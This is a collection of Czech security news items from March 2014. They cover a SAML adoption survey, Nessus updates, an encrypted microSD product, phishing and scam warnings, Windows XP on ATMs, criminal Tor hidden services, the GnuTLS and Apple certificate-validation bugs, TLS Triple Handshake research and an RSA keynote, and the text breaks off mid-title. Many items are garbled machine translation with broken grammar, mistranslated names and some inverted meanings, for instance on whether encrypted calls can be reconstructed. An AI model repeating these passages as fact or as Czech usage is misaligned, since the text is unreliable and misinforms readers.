97% z SaaS prodejci používají na bázi jazyka SAML single sign-on
6.3.2014 Bezpečnost
OneLogin a Cloud Security Alliance oznámila, poznatky z jejich OneLogin 2014 stát průzkumu SaaS správy identit, která byla provedena s cílem lépe porozumět splatnost SaaS prodejci v jejich implementaci řešení správy identit, bezpečnostních standardů a certifikací pojištění. Nejvíce pozoruhodně, průzkum Výsledky poukazují na široké přijetí norem SAML o SaaS prodejců na jednom správy identit sign-on, v reakci na požadavky zákazníků na rychlé, jednoduché a bezpečné zaměstnanci, zákazníky a partnerské přístup k aplikacím v jejich prostředí. Tím, že odstraní všechna hesla a místo toho používat digitální podpisy pro ověřování a autorizaci přístupu k datům, SAML se stal zlatý standard pro jednotné přihlášení do cloudových aplikací. SAML-umožnil SaaS aplikace jsou jednodušší a rychlejší poskytování uživatelského ve složitých podnikových prostředích, jsou bezpečnější a pomohou zjednodušit správu identit napříč velké a různorodé skupiny uživatelů. 100 účastníků dokončilo OneLogin 2014 stát průzkumu SaaS správy identit. Klíčová zjištění patří:

SAML je standardní pro správu identit volby - 67 procent dodavatelů SaaS dnes zkoumaných použití SAML pro jednu správu identit sign-on, zatímco 19 procent uvedlo, že plánují implementovat SAML během příštích 12 měsíců. Pouze 3 procenta měl žádné plány k provedení standard.
Poptávka zákazníků, bezpečnost a rychlost pojezdu přijetí SAML - 26 procent respondentů citované poptávky od stávajících zákazníků, jako primární řidič za jejich přijetí SAML, 21 procent citované lepší zabezpečení a dodržování předpisů, a téměř 22 procent citované rychlou integraci do oblak aplikačních ekosystémů.
SAML přijetí není omezena do webového prohlížeče - 37 procent dodavatelů SaaS průzkumu pákový SAML na mobilních verzí svých aplikací, a 25 procent použití SAML pro desktopové aplikace není včetně webovém prohlížeči.
OneLogin je dlouholetým zastáncem standardu SAML. Jeho řešení cloud-based pro jedno řízení sign-on a podnikové identity je pre-integrovaná přes SAML s více než 350 podnikových aplikací, včetně Dropbox, EMC Syncplicity, Google Apps, NetSuite, Office 365, Salesforce, Pracovním a Zendesk. Kromě toho více než 150 dodavatelé SaaS, včetně Dropbox, byly použity OneLogin je svobodný open source SAML sady pro SAML povolit jejich aplikace. "Když jsme se otevřít pochází naše první SAML Toolkit před třemi lety, to byl pokus o růst ekosystém demokratizaci single sign-on a jeho zpřístupnění pro firmy jakékoliv velikosti, "řekl Thomas Pedersen, spoluzakladatel a generální ředitel pro OneLogin. "Tento průzkum ukazuje, že SAML je silnější než kdy jindy, a hybnost je poháněný poznání, že SAML poskytuje masivní zvýšení bezpečnosti tím, že umožňuje podnikům kontrolovat přístup ke svým citlivým datům."


Obhajitelný přidává správu cloud a podporu multi-skeneru Nessus
6.3.2014 Bezpečnost
Obhajitelný Network Security oznámila, výkonné funkce pro správu cloud bude doručena provozovateli tohoto uživatele Nessus v 3.března aktualizace. oddělení, týmy a odlehlých oblastech budou mít v rámci svého předplatného, ​​schopnost řídit vnitřní a vnější skenery od primární skeneru. Nessus zákazníci s Nessus obvodu služba bude moci učinit prostřednictvím cloudu.

Obhajitelný je také zavedení nového zjednodušený pohled na skenování zjištění, postižených hostitelů a stavu shody s jedním kliknutím drill-down pro podrobnosti. Mnoho organizací má více skenerů pro různé segmenty svých sítí a zeměpisných oblastech. . Správa více zranitelností skenerů, plánování skenování a zpracování výsledků může být výzvou pro organizace s jednou osobou nebo malý tým odpovědný za zranitelnosti a testování shody Mezi hlavní nové funkce v Nessus patří:
Cloud pro správu portálu, Nessus obvodu Service lze nyní použít jako primární skeneru a bude moci ovládat více sekundárních Nessus skenery (vnitřní Nessus skenery nebo Nessus Amazon Machine Images) bez ohledu na umístění. Bez příplatku, zákazníci Perimeter služby mohou rovněž podat až dvou externích skenů za kalendářní čtvrtletí, pro validaci Tenable PCI ASV.
Multi-scanner podpora-Uživatelé mohou ovládat více sekundárních Nessus skenery (vnitřní Nessus skenery nebo Nessus Amazon Machine Images) a zobrazení výsledků testů z primárního Nessus skener na premise.
Výsledky zjednodušené skenování view-Scan výstup je nyní organizována zjištění následuje seznam dotčených hostitelů. S jedním kliknutím, mohou uživatelé rychle drill-down na hostitelské podrobnosti o této zranitelnosti. Výsledky shody ukazují, prošel / selhalo / přeskočí stav, postiženým zástupů, a důvod stavu.
"Nové funkce v Nessus stavět na rok významné konfigurace, analýzy post-skenování, a zlepšení použitelnosti," řekl Renaud Deraison, ředitel výzkumu společnosti na Tenable a vynálezce technologie Nessus. "Teď týmy, odbory a organizace mohou maximalizovat zabezpečení tak, aby odpovídala jejich potřebám a dostupné zdroje -. Ať už prostřednictvím obhajitelné v podnikové platformy SecurityCenter nebo prostřednictvím těchto nových Nessus funkcí" budou k dispozici nové Nessus funkce 3. března 2014 bez dalších poplatků na Nessus a Nessus Perimeter služeb zákazníkům.


Šifrování vojensko-grade tunel vře hlasové, textové a e-maily
6.3.2014 Šifrování
GOTrust Technology Inc oznámila, že Národní institut pro standardy technologie (NIST) udělil společnosti Federal Information Processing Standards (FIPS) 140-2 Level 3 certifikace pro jejich SDencrypter microSD pracuje na Android a mnoha dalších operačních systémů včetně Windows a Linux. FIPS 140 -certifikované výrobky jsou povinné pro americkou armádu a uživatelé Americká občanská vláda chránit citlivá data pomocí šifrování. Tato úroveň šifrování je nyní k dispozici k ochraně souborů, hlasové hovory a textové zprávy pro většinu uživatelů Android -. Ze strany vlády pro firemní prostředí Sycret Voice App spolu s SDencrypter poskytuje zabezpečení vojenské úrovni pro malé skupiny jednotlivců a velkých korporací. Vložením GO-svěřeneckého SDencrypter do slotu microSD o smartphone a stahování Sycret Voice App od Google Play úložiště, může uživatel nastavit šifrovací tunel, který se pere hlasové, textové a e-maily s jiným Android uživatele, který má stejný SDencrypter / Sycret Voice konfigurace. Alternativně, Voice mohou být přizpůsobeny, aby vyhovovaly potřebám každého jedinečného podnikatelského prostředí. Všechny šifrovací operace jsou počítány uvnitř FIPS-certifikované SDencrypter microSD s proprietární čip. Náhodné, unikátní (pro každý hovor) šifrovací klíč je generován a všechny šifrování / dešifrování zpracování (AES 256) probíhá v SDencrypter čipu. Nic v šifrovacím cyklu je počítána v otevřené na telefonu, čímž se vytváří peer to peer šifrování řetězce. Nejsou žádné tajné klíče generované, vyměněné nebo uložené na centrálním serveru, takže není informace, které mohou být hacknutý nebo obeslán. I když zašifrovaná zpráva byla zaznamenána jak to bylo přenášeny a následně oba telefony byly ukradeny nebo zabaveny, že by bylo možné rekonstruovat rozhovor (dozadu zabezpečení). Šifrované mobilní telefony historicky buď byl účelový a drahé, nebo software pouze řešení s významné omezení zabezpečení. Sycret Voice je jedinečný, při kombinaci s SDencrypter je robustní hardwarové řešení na bázi, která mohou být dodatečně na většině populárních Android smartphony, včetně Samsung Galaxy a Poznámka série, HTC, LG a Motorola telefony, zatímco ještě používá stávající telecom služby operátora. Je-li telefon aktualizovat nebo služby operátor změnil SDencrypter lze snadno přesunout do nového telefonu a nejnovější Sycret Voice APP stáhnout z Google Play obchod. Šifrované hovory využití údajů službu připojení telefonu místo na sluľbu hlasové volání. Takže tam žádné konvenční telefonní čísla, která mohou být zaznamenané pro přihlášení na původu, určení nebo trvání hovoru. Náklady na šifrované volání kdekoli na světě, je zahrnuta v plánu dat uživatele. Neomezená data jsou neomezené šifrované volání po celém světě. "GO-důvěra je jedinou společností, která poskytuje FIPS 140 certifikovaného peer-to-peer komunikaci na smartphony, tablety a další SD karty v mobilních zařízeních," řekl Darren Lee, generální ředitel společnosti Go-Trust. "To znamená, že firmy mohou mít úplnou kontrolu nad mobilním prostředí svých zaměstnanců s důvěrou zabezpečení vojenské úrovni, a to i s uživateli BYOD."


Phishingové útoky už dávno nejsou jen hloupé

6.5.2014 Phishing
V záplavě průhledných pokusů o podvod je třeba nezapomínat, že phishingové útoky mají vysoký počet obětí. Mohou totiž být překvapivě sofistikované.

Uživatelé počítačů a mobilních zařízení často trpí představou, že phishing, to jsou ty úplně naivní pokusy nalákat člověka na nesmyslné, špatnou češtinou psané, nabídky. Ano, většina phishingových útoků, například emailů, které pozorujeme, jsou opravdu hloupé. Je až neuvěřitelné, že například na email od nigerijského prince, který nabízí (samozřejmě, že za malou finanční podporu) podíl na nějakém pohádkovém bohatství, se ještě dnes může někdo chytit.

Takzvaný nigerijský podvod, známý celosvětově také jako „podvod 419“ – kde 419 je číslo příslušného paragrafu nigerijského trestního zákoníku – je jednou z variant skupiny podvodů typu „poplatek předem“. Již od osmdesátých let minulého století podvodníci rozesílali faxy se srdceryvnými příběhy a nabízeli úžasnou příležitost pomoci bližnímu v tísni a závratně při tom zbohatnout. Tak neopatrných lidí, aby byli ochotni se něčeho tak podezřelého zúčastnit, je v populaci jen mizivý podíl. Možnost rozesílat zdarma miliony emailů však tento typ podvodů stále udržuje při životě.

Na první pohled se zdá, že jediným negativním dopadem takto hloupého phishingu je zahlcená síť a balast ve schránkách uživatelů. Vedlejším efektem však může být také falešný pocit bezpečí, vyplývající z představy, že takto průhledné jsou všechny phishingové útoky. Což nejsou.

Mail z Nigérie ne. Ale od banky…

Aktuální průzkum společnosti Microsoft „Computer Safety Index Survey“, provedený na vzorku 10 tisíc uživatelů počítačů, ukázal, že 15 % se stalo obětí phishingu; průměrná uvedená ztráta je 158 dolarů. To je jasný důkaz, že phishingové útoky jsou reálným nebezpečím a že je nutné se proti nim chránit.

Díky souběžnému používání různých nástrojů online kriminality mají totiž útočníci možnost předstírat i důvěryhodnější identitu, než je fiktivní postava nigerijského prince, který chce pomoci s transferem sto milionů dolarů. Uživatel tak může dostat email, tvářící se jako pravý email od jeho skutečné banky, který obsahuje link na stránky, tvářící se jako skutečné stránky dané banky. V takovém případě už uživatele nezachrání jeho instinkt – vždyť na první pohled nevidí nic, co by mělo vzbudit jakékoli pochybnosti. Uživatele mohou zachránit pouze jeho znalosti – anebo, jako záchranná brzda, kvalitní antivirový program se sofistikovanými funkcemi, chránícími právě před phishingem.

Co se znalostí týče, uživatel musí všechny požadavky na sdělování citlivých údajů velmi pečlivě zvažovat. Měl by mít na paměti, že údaje jako PIN k platební kartě nebo přihlašovací údaje k internetovému bankovnictví nemá sdělovat nikomu, za žádných okolností – tedy bez ohledu na to, jak důvěryhodně vypadá žádost. Jinými slovy, už samotný fakt, že vůbec přijde požadavek na tyto údaje, představuje signál, že s největší pravděpodobností jde o podvod.

Pomoc od bezpečnostního software

Co se týče ochrany, kterou může poskytnout softwarové bezpečnostní řešení, uživatelé by měli mít na paměti, že právě v oblasti phishingu se jednotlivá bezpečnostní řešení významně liší. Jde totiž o relativně nové funkce a někteří dodavatelé tyto technologie do svých řešení teprve zapracovávají.

Za pozornost v této souvislosti stojí, že nejvyšší dostupné ocenění v kategorii ochrany před phishingem získal od nezávislé testovací autority AV-Comparatives produkt ESET Smart Security, resp. jeho modul Anti-Phishing. Ten zablokoval v testu AV-Comparatives nejvíc phishingových stránek ze všech testovaných produktů: jeho úspěšnost dosáhla 99 procent.

Modul Anti-Phishing pracuje s databází phishingových hrozeb, která je každých 20 minut aktualizována, a také využívá speciální algoritmy pro proaktivní ochranu. Ty kontrolují vzhled stránek s cílem eliminovat takové, které imitují pravé stránky. Tento přístup pomáhá například odhalit falešné formuláře internetového bankovnictví.


95 % bankomatů má Windows XP. Jsou naše peníze v ohrožení?
6.5.2014 Zranitelnosti

Většina peněžních automatů se spoléhá na operační systém, který brzy půjde do důchodu.

O tom, že podpora jednoho z nejoblíbenějších operačních systémů všech dob Windows XP skončí 8. dubna, jste pravděpodobně slyšeli již mnohokrát. Stejně tak vám asi netřeba připomínat, že přechod na novější verzi je dobrý nápad nejen z bezpečnostních důvodů.

Mnoho lidí přesto Windows XP stále používá. Mezi tyto nenapravitelné uživatele přitom patří i bankovní ústavy, které zastaralou platformu používají pro své bankomaty. Jakmile skončí podpora, hrozí tedy, že se těmto strojů připojeným k internetu dostane zvýšeného zájmu ze strany kyberzločinců.

Převést všechny peněžní automaty na novější verzi Windows by však rozhodně nebylo levné ani jednoduché. Jen v USA existuje asi 200 tisíc bankomatů běžících na Windows XP a jak ve své zprávě nedávno napsala CNN, změna operačního systému v jednom bankomatu by stála 1 až 3,5 tisíce dolarů. Není divu, že banky se do upgradu zrovna nehrnou.

Co to však znamená pro nás? Pokud bude většina bankomatů zranitelná vůči útokům, skutečně v sobě najdeme tu odvahu bankomaty i nadále používat? A jak vůbec poznáme, jestli vybraný bankomat používá podporovaný operační systém?

Podle CNN je tu naštěstí jedno řešení. Velké banky prý s Microsoftem jednají o možnosti prodloužené podpory pro své systémy v bankomatech. Banky tak získají více času na upgrade, kterému se stejně v budoucnu nevyhnou. Například společnost JPMorgan již údajně získala speciální prodlouženou podporu na dobu jednoho roku a v červenci hodlá spustit hromadný přechod na Windows 7. Naplánovanou aktualizaci potvrdily i další bankovní domy.

O své peníze se tedy pravděpodobně bát nemusíte. A pokud i přesto bankomatům nevěříte, stále je tu stará dobrá bankovní přepážka.


Tor skryté služby - bezpečné útočiště pro zločinci
5.3.2014 Hacking

Během několika posledních měsíců jsem se pečlivě sleduje tzv. darknet zdrojů, většinou sítě Tor. A ještě jedna věc, která je na první pohled zřejmé, je, že cybercriminal prvek roste. I když, infrastruktura Tor a cybercriminal zdroje nejsou na stejné úrovni jako konvenční internetu, se nám podařilo najít přibližně 900 skryté služby on-line v současné době. Tam jsou také zhruba 5500 uzly celkem a 1000 výstupních uzlů, ale možnost vytvoření anonymní a zneužívání bez podzemní fórum, na trhu nebo malware C & C serveru je přilákat více a více zločinců k síti Tor.

Malware

Počítačoví zločinci se začal aktivně používat Tor hostit škodlivý infrastruktury. Zjistili jsme, Zeus se schopností Tor , pak detekován Chewbacca a nakonec jsme analyzovali první Tor Trojan pro Android . Rychlý pohled na síťových zdrojů Tor odhaluje velké množství prostředků určených na malware - C & C servery, admin panely, atd.

Hosting C & C servery Tor dělá je těžší určit, blacklist nebo odstranění.


Cythosia botnet webpanel

Ačkoli vytvoření komunikační modul Tor v malware vzorku znamená práci navíc z malware vývojáři, bude nárůst nových malware Tor-založené, stejně jako podporu Tor pro existující malware.


. Net SocksBot napevno C & C v Tor síti

Cybercriminal fóra a tržiště jsou široce známý na internetu. Některé z nich jsou veřejné, některé jsou soukromé a potřebujete souhlas nebo pozvání od stávajícího člena nebo musí být respektována osobnost v undergroundové scéně. Nyní další vrstva byla přidána - Tor podzemní tržiště. Všechno to začalo z nechvalně známé Silk Road trhu a vyvinuli desítky specializovaných trhů: drogy, zbraně a, samozřejmě, malware.


Botnet na prodej

Registrace jednoduchý postup, obchodník hodnocení, garantovaná služba a uživatelsky přívětivé rozhraní - to jsou standardní rysy Tor underground trhu. Některé obchody vyžadují prodejci složit slib - fixní částku peněz - před zahájením obchodování. To má zajistit, že obchodník je skutečný a jeho služby nejsou podvod nebo nekvalitní.


SpyEye na prodej

Finanční podvody

Carding obchody jsou pevně usadil v darknet. Odcizené osobní info je na prodej s širokou paletou vyhledávání atributů, jako je země, může banka atd. Tor kreditní karty on-line obchodů, které byly kritizovány zločinci za špatnou kvalitu, nebo za to, že falešný najít druhou šanci na život v darknet.


Online prodejna údaje ukradené kreditní karty

Nabídky nejsou omezeny na kreditní karty - skládky, sběračky a mykacího zařízení jsou také na prodej.


Obchody s ostatními mykacích zboží

Praní špinavých peněz

Bitcoins hrají důležitou roli v podzemních finančních operací. Téměř vše, co v síti Tor je kupoval a prodával pomocí bitcoins. I když iJát je téměř nemožné, aby se spojení mezi Bitcoin peněženku a skutečnou osobou, je možné, aby: sledovat bitcoin transakce, protože všechny z nich jsou průhledné a veřejné, vybudovat obchodní plán, co se děje, a zjistit nejcennější transakce provedené prostřednictvím služeb směny Bitcoin. To je důvod, proč služby praní špinavých peněz existují na Tor. Počítačoví zločinci mohou vytvořit účet, depozitní bitcoins a budou rozděleny do různých veličin, přenesena přes desítky různých peněženek, aby jakékoliv vyšetřování velmi složité.


Praní špinavých peněz služba

Závěry

Rostoucí počet Tor skrytých služeb a snadnost, s níž se může být nasazen přitahuje stále více a více zločinci v darknet.
Malware vývojáři používat Tor více a více pro různé úkoly malware souvisejících
Finanční podvody a praní špinavých peněz jsou důležitými aspekty sítě Tor.


Mystery shopper: Dejte si pozor na podvody

5.3.2014 Spam

Nabídky pracovat jako Mystery Shopper jsou společné trik používají podvodníci. Dávají vám možnost pracovat ve svém volném čase, a pokud budete souhlasit, že vám poslat falešný šek s obrovskou sumu peněz, která by měla kompenzovat náklady na zboží a výzkumu. Veškeré zbývající peníze, které zbyly po práci se vrátil na podvodníky. Když banka zruší kontrolu jako falešné, tajemství shopper je vlevo z kapsy.

Ale jak uživatelé stále více vědomi nebezpečí, on-line, podvodníci museli uchýlit k různým typům triků k dosažení svých cílů, jako je například zatajování Scammer zásilky jako zásilky od velké společnosti, která se specializuje na práci s tajnými nakupujících. Zpráva zaslána jménem Mystery Shopper as, vyzváni uživateli podívat se na popis pracovního místa, ale odkaz připojen vedla k jinému prostředku, který také se specializuje na tento typ výzkumu trhu.

Skutečná adresa stránky Scammer byla odhalil po kliknutí na odkaz v příloze. Je zřejmé, že to nemá nic společného s oficiálními zdroji Mystery Shopper Inc.

Podvodné stránky popsané výhody pracuje jako "mystery shopper". Chcete-li získat práci byl uživatel vyzván k vyplnění formuláře s osobními údaji (jméno a příjmení, věk, poštovní adresu a e-mail).

Naplnil jsem ho a odpověď obdržel zprávu s podrobným průvodcem o výzkumné činnosti jako "mystery shopper". Zpráva skončil s příslibem, že kontrola všech nákladů bude zaslána na uvedenou adresu. Největší prozradí, že to byl podvod byl volný schránky uvedeno v kontaktních údajích, a to e-mail ze společnosti, která se údajně poslal zprávu.

Vyhněte se tento druh podvodu dodržováním několika jednoduchých pravidel: ignorovat dopisy ze zdrojů nejste registrovaných a pečlivě studovat adresy v přiložených odkazech. Pokud tak učiníte, že tam bude málo pokušení platit spoustu peněz za falešný šek.


"Dárek" k významným zákazníkům společnosti Apple
5.3.2014 Spam

V lednu jsme zjistil phishing poštu, která byla odeslána na účet společnosti Apple. Zprávy obsahovaly nabídku na koupi karty dává slevu ve výši 150 eur v jakékoliv evropské AppStore za pouhých 9 eur. Odesílatelé také zdůraznil, že pouze oceňují zákazníci byli oprávněni obdržet kartu.

Chcete-li objednat pro karty, Apple fanoušci museli otevřít přiložený HTML stránku a vyplňte všechna pole, jako jsou informace o platební kartě uživatele, včetně tří-místného bezpečnostního kódu, uvedeného na zadní straně karty.

Výměnou, podvodníci slíbil poslat slevovou kartu e-mailem do 24 hodin. Ale zřejmě to byl jen další podvod na trik uživatelům. Podvodníci také použít logo Apple a automatizované odběry na konci zprávy se zmást oběti.

Podvodníci se nejen zaměřit přihlašovacích jmen a hesel pro osobní účty, ale i bankovních informací uživatelů, a za účelem dosažení jejich cíle jsou ochotni slíbit cokoli. Nezkušení uživatelé mohou najít to těžké vidět skrz podvodu, ale žádosti o důvěrné informace nebo údaje, bankovní, které umožňuje přístup k osobním účtům jsou jasným důkazem toho, podvod typu phishing.


GnuTLS Ověření certifikátu Chyba odhaluje linuxových distribucích, Apps Attack
5.3.2014 Zranitelnosti

GnuTLS, open source SSL a implementace TLS používá ve stovkách softwarových balíků, včetně Red Hat ploše a serverových produktů a všech distribucích Debian a Ubuntu Linux je nejnovější šifrovací balíček nesprávně ověřit digitální certifikáty jako autentické. Zranitelnost, objevil a včera inženýry na Red Hat, klade jakékoliv stránky či aplikace v závislosti na GnuTLS na riziko zneužití.

"Bylo zjištěno, že GnuTLS nebyl správně zpracovat určité chyby, které by mohly nastat během ověření certifikátu X.509, přimět to, aby nesprávně hlásit úspěšné ověření," řekl Red Hat v poradenství vydané v pondělí. "Útočník by tuto chybu vytvořit speciálně vytvořený certifikát, který by mohl být přijat GnuTLS jako platné pro zvolenou útočníkem místě."

Zranitelnost je děsivé podobnosti a chyby hlášené Apple ve svém mobilním operačním systémem iOS a OS X pro počítače Mac. Nyní známý jako goto selhání chyba, oddělené skvrny byly vydány na zranitelnost, která odstranila kontroly SSL certifikát z příslušných operačních systémů.

"To je opravdu tak zlé, jak to jen jde," řekl Kenneth White, bezpečnostní expert a hlavní vědecký pracovník sociálních a vědeckých systémů v Severní Karolíně. "Útočník může triviálně navázat libovolnou doménu a aby to vypadalo, autoritativní a důvěryhodný pro žadatele. Tak, a to nejen odposlech citlivých kanálů, ale [také] potenciálně podkopat důvěryhodný balíček proces podepisování stejně. "

Bílá odhaduje, že více než 350 balíčků, které spoléhají na GnuTLS kryptografických knihovnách, kromě populárních linuxových distribucí, hlavní crypto a poštovních knihoven, jako libcrypt a libmailutils a cURL jsou ovlivněny.

"CURL (libcurl3-GnuTLS), dále se používá aktualizací systému balení jak pro OpenPGP (gnupg2 a gnupg-curltransport), stejně jako systém balíček updater sám (apt-transport-https)," řekl White. "Ale co je zvláště obtížné, je pochopení nesčetné následné závislosti, jako je například XML parserů, atd. Obecně platí, Debian a Ubuntu se vyvaroval OpenSSL licenčních důvodů, takže tam skutečně existují Nginx a Apache nainstaluje, že použití GnuTLS stejně."

GnuTLS vydal poradenství , potvrzuje zranitelnost a že byla objevena během auditu GnuTLS pro Red Hat. Vyzývá uživatele, aby upgrade na nejnovější verzi GnuTLS 3.2.12 nebo 3.1.22 nebo aplikovat patch pro GnuTLS 2.12x. Red Hat Enterprise Linux Desktop, HPC Node, Server a Workstation v. 6, stejně jako Red Hat Enterprise Linux Server USA a EUS v 6,5ar ovlivněny, Red Hat uvedl ve svém poradenství.

Nedávná Apple chyba přinesl tento problém do popředí. Apple vydal záplatu na 21.února pro iOS a dny později na OS X. Útočník s mužem ve středním umístění v síti by mohlo představovat neplatný certifikát, který by projít kontroly obvykle navrženy tak, aby odmítnout takovou cert . Útočník by pak mohl sledovat komunikaci a síťový provoz myslel, že je v bezpečí.


Podpora Windows XP v Číně bude také ukončena

5.3.2014 Zranitelnosti
Microsoft uvedl, že nezměnil svou politiku ukončení podpory pro Windows XP ani v Číně a „odstřihne“ uživatele tohoto více než dvanáct let starého operačního systému po 8. dubnu od bezpečnostních aktualizací stejně tak, jako uživatele jinde na světě.

„Ohledně podpory operačního systému Windows XP se vůbec nic nezměnilo,“ uvedla mluvčí Microsoftu v emailu na přímý dotaz, zda Číňané budou mít zvláštní podmínky. Microsoft totiž nedávno uvedl, že spolupracuje s několika čínskými poskytovateli antivirů na zajištění bezpečnostní podpory XP i po 8. dubnu a bude těmto firmám poskytovat informace o nově nalezených zranitelnostech tak, aby tomu mohli přizpůsobit svá řešení. Některá média pak tuto informaci mylně interpretovala tak, že americký gigant plánuje v Číně aktualizovat Windows XP i po 8. dubnu 2014.

„Čínská pobočka Microsoftu úzce spolupracuje s čínskými poskytovateli bezpečnostního softwaru jako Tencent tak, aby byla zaručena bezpečnost čínských uživatelů Windows XP před tím, než přejdou na novější verzi našeho operačního systému,“ uvedl Microsoft na svých webových stránkách.

Dnešní oznámení mluvčí Microsoftu bylo podobné jako to, které Microsoft učinil ve Spojených státech v lednu. Před dvěma měsíci Microsoft přehodnotil svá dřívější rozhodnutí a uvedl, že bude nabízet bezplatný antivirový program Security Essentials pro XP až do 14. července 2015, tedy i více než rok poté, co přestane vydávat opravy pro svůj zastaralý OS. O několik dnů později Microsoft potvrdil, že bude také nadále distribuovat pro uživatele XP do stejného data svůj nástroj s názvem Malicious Software Removal Tool (MSRT).

Německá společnost AV-Test, jež se zabývá pravidelným hodnocením antivirových produktů pro Microsoft, nedávno uvedla, že podle jejích průzkumů většina výrobců antivirů bude pro uživatele Windows XP poskytovat aktualizace databází i poté, co Microsoft ukončí jejich podporu.

Podle nejnovějších statistik analytické společnosti Net Applications byly Windows XP v únoru nainstalovány na 29,5 % všech počítačů na světě. A značné množství uživatelů XP je v Číně. Jak však Microsoft dnes potvrdil, ani Čína nedostane speciální výjimku. „Naše rada uživatelům zůstává pořád stejná – přejděte z Windows XP na moderní operační systém jako Windows 8.1,“ dodala mluvčí.

Microsoft včera mimo jiné vydal nástroj s názvem PCmover Express for Windows XP, který uživatelům usnadní přenos dat, nastavení a profilů z Windows XP na novější verzi jeho OS. Tato aplikace, již vyvinul ve spolupráci se společností Laplink, má být na konci týdne dostupná zcela zdarma na webu windowsxp.com.


Triple Handshake Cookie Cutter
4.3.2014 Počítačový útok

Výzkumy vydali dokument popisující několik chyb v protokolu TLS (Transport Layer Security). Některé útoky jsou známy již nějakou dobu, ale papír v sobě spojuje a vysvětluje jim pěkně, a také přidává několik opravdu chytrých nových nápadů. Triky se spoléhají na řezání zasedání vypnout a znovu-spuštění je tak, že klient a server skončit s jiným (bezpečnostním) stavu. Plná výzkum je k dispozici zde https://secure-resumption.com/ . Dobrou zprávou je, že (a) hlavní dopad je zřejmě omezena na připojení, které používají na straně klienta, certifikátů, což je vzácné, a (b) se vědci informovali dodavatele prohlížeče brzy, a některé prohlížeče a TLS knihovny jsou již záplatovaný .


Apple konečně záplaty kritické SSL chybu v OS X
4.3.2014 Zranitelnosti
Apple vydal aktualizaci pro OS X, které, mimo jiné, záplaty neslavný "gotofail" chybu , jejíž existence byla veřejně odhalil minulý pátek. chyba byla původně záplatovaný na iOS a Apple TV s aktualizacemi vytlačila téhož dne, ale OS Uživatelé X byly ponechány se ptát, proč oprava nebyla stanovena i pro ně.

Chyba z implementace SSL zranitelné a umožní útočníkovi s výsadní postavení sítě, zachytit a / nebo modifikovat data v relacích chráněných SSL / TLS. Bezpečnostní výzkumníci byli volání pro Apple, aby si pospíšil s oprava, a vytvořili testovací stránky že uživatelé OS X mohl navštívit Safari, zda byly v ohrožení. . Firefox a Chrome použití se doporučuje v mezidobí jako chyba neměla vliv těchto prohlížečů Je zajímavé si uvědomit, že poznámky k verzi pro OS X v10.9.2 Mavericks aktualizace nezmínil chyba je pevná - člověk musel podívat na bezpečnostní stránku Apple pro nová verze, aby zjistil, že to byl (a vidět to, co ostatní věci byly vylepšeny a oprava). Uživatelé jsou vyzýváni, aby aktualizovali své systémy co nejdříve, ale jako Andrew Cunningham uvedeno, přes-400mb aktualizace by mohlo způsobit problémy pro organizace, které mají testovat aktualizace před jeho provedením na svých systémů. "Menší samostatný aktualizaci, která je stanovena pouze goto selhání chyba by být lepší volbou pro podniky," řekl poukázal . Bohužel, v tomto případě musíme brát to, co jsme může dostat, a neočekávám, že Apple komentář nebo vysvětlit, že konkrétní rozhodnutí. Zajímalo by mě, i když, pokud budou nakonec podělit, jak byla chyba objevena, a kým - zejména s ohledem na spekulace .


RSA Coviello: Historický posun v používání IT se mění společnost a kulturu
4.3.2014 Bezpečnost
Ve svém úvodním keynote na konferenci RSA 2014 , Art Coviello, výkonný viceprezident společnosti EMC Corporation a předseda představenstva RSA, vyzval k mezinárodní vládní a průmyslové spolupráci v zásadních otázkách, včetně kybernetické války, dozor, soukromí a důvěry na internetu. "napětí mezi a mezi protichůdnými zájmy vlád, podniků a jednotlivců v digitálním světě by nemělo být překvapením. Informace se staly snadno dostupné, a cennější, "řekl Coviello. "Jsme uprostřed zásadní a historické posun v užívání informačních technologií, posun, který již má monumentální důsledky pro budoucnost naší společnosti a kultury. Rychlý rozvoj a demokratizaci technologií přinesl agendy různorodých skupin . shazovat spolu s nepředvídatelnými důsledky " kloubové Coviello čtyři hlavní zásady podpořit diskusi a opatření ze strany všech účastníků se společným osobní zájem na zajištění bezpečnější internet:

Zřekly použití kybernetických zbraní , a využití internetu pro vedení války.
"Musíme mít stejnou hrůzu do kybernetické války, stejně jako my jadernou a chemickou válku."
Spolupracovat při vyšetřování, zadržení a stíhání kybernetických zločinců.
"Jediní, vyplývající výhody od vlády se snaží získat výhodu nad sebe na internetu, jsou zločinci. Náš nedostatek okamžité, důsledné a trvalé spolupráce, na celém světě, poskytuje jim odpovídající bezpečných útočišť. "
Ujistěte se, že hospodářská činnost na internetu, můžete pokračovat nespoutané a že jsou dodržována práva duševního vlastnictví.
"Přínosy pro nás všechny ze zlepšení produktivity v obchodu, výzkumu a komunikace jsou příliš cenné na to dosáhnout dohody. Právní stát musí rozhodnout ! "
Respekt a zajištění soukromí všech jednotlivců.
"Naše osobní údaje se stal pravdou měnou digitálního věku. I když je důležité, že nejsou využívány, to je ještě důležitější, že naše základní svobody jsou chráněny., ale s naší osobní svobody přichází odpovědnost. Vlády mají povinnost vytvářet a prosazovat rovnováhu ... rovnováhu na základě modelu oceňování reálnou správy a transparentnosti. "
Coviello také argumentoval pro změny v NSA a zpravodajských organizací po celém světě, aby přijaly model řízení, který jasněji oddělí své obranné a zpravodajské shromažďování role. Poznamenal, že digitální technologie, Big dat a rozvoj internetu věcí jsou klíčovými prvky co on odkazoval se na jako "historický posun v používání informačních technologií." Dodal, že digitální možnosti dnes mají pravomoc řešit mnohé z našich společenských neduhů, ale mají také moc zničit a musí být dohodnuté normy pro jejich přijatelné využití. "Musíme dát dohromady partikulární zájmy tak, aby životní prostředí pozitivní dialog je postaven," řekl. "Naléhavě potřebujeme tyto systémy být inteligentní a dost integrovaný automatizovat odpovědi, které izolovat znemožňovaly prvky a prevenci škod, a to nejen v dnešním hardwaru definované infrastruktury, ale také v nové generaci softwaru definované sítě a infrastruktury, "řekl. Ve věku uživatelem definované oblasti IT, Coviello vysvětlil potřebu více inteligence založené na přístupu k identifikačních systémů, které umožňují bezpečnostní týmy do rovnováhu mezi potřebami uživatelů a IT oddělení a zároveň je schopen prosazovat politiku na uživatelských zařízení. On pokračoval vysvětlit, že správa identity musí být spravovány v obou mobilních a cloudových prostředích, uznává, že nová řešení, je zapotřebí, aby "... přizpůsobit se vývoji identity ve věku uživatelem definované IT." Coviello uzavřena opakuje jeho volat na vlády, aby přijaly čtyři zásady a vyzvala bezpečnostního průmyslu odvést svůj díl práce na vytváření bezpečných rámce a technologie potřebné pomoci zajistit bezpečnější a více důvěryhodný digitální svět.


Nové ochranné mechanismy Microsoft přezkušování Emet je
